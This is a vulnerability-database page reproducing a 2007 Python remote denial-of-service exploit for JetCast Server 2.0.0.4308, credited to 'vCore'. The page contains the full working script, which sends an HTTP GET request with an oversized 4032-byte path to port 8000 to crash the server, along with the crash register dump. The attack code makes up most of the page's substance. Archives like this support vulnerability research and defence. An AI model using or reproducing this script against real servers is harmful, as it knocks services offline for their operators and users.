Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

JetCast Server 2.0.0.4308 Remote Denial of Service Exploit

🗓️ 08 Sep 2007 00:00:00Reported by vCoreType 
zdt
 zdt🔗 0day.today👁 16 Views

JetCast Server 2.0.0.4308 Remote DoS Exploi

Code
==========================================================
JetCast Server 2.0.0.4308 Remote Denial of Service Exploit
==========================================================


#!/usr/bin/python
"""     ____
__   __/ ___|___  _ __ ___
\ \ / / |   / _ \| '__/ _ \
 \ V /| |__| (_) | | |  __/
 \_/  \____\___/|_|  \___|     _
 _ __  _ __ ___  ___  ___ _ __ | |_ ___   _
| '_ \| '__/ _ \/ __|/ _ \ '_ \| __/ __| |_|
| |_) | | |  __/\__ \  __/ | | | |_\__ \  _
| .__/|_|  \___||___/\___|_| |_|\__|___/ |_|
|_|        _
      _  //
      \\//
GENRE: //\\PLOIT
     //  `
PROGRAM: JetCast Server 2.0.0.4308
EXPLOiT TYPE: 0day remote DoS exploit
EXPLOiT LANGUAGE: Python
DEBUG iNFO: [Module JSMP3OGG]
           EAX 100355B8 JSMP3OGG.100355B8
           ECX 00000007
           EDX 00002000
           EBX 00CB415A
           ESP 00DCDEC0
           EBP 00DCDECC
           ESI 00000000
           EDI 1002FA64 ASCII "Mozilla"
           EIP 1002737C JSMP3OGG.1002737C

           MOV AH,BYTE PTR DS:[ESI]; C0000005 (ACCESS VIOLATION)

Bug found / exploit written by vCore <[email protected]>
Tested on JetCast Server 2.0.0.4308 - Windows XP ServicePack2
 ____          _
 / ___|_     __| | ___   _
| |   / _ \ / _` |/ _ \ |_|
| |__| (_) | (_| |  __/  _
 \____\___/ \__,_|\___| |_|

"""
from time import sleep
from socket import *

target = '127.0.0.1'
port = 8000
buf = "A" * 4032

header = (
   'GET /%s.mp3 HTTP/1.0\r\n'
   'Host: %s\r\n'
   'User-Agent: WinampMPEG/5.19\r\n'
   'Accept: */*\r\n'
   'Icy-MetaData:1\r\n'
   'Connection: close\r\n') % (buf, target)

s = socket(AF_INET, SOCK_STREAM)
s.connect((target, port))
s.send(header)
sleep(2)
s.close()

print "DONE"



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Sep 2007 00:00Current
7High risk
Vulners AI Score7
jetcast serverremote denial of servicepython exploitwindows xp0day exploitwinampmpeg/5.19icy-metadata
16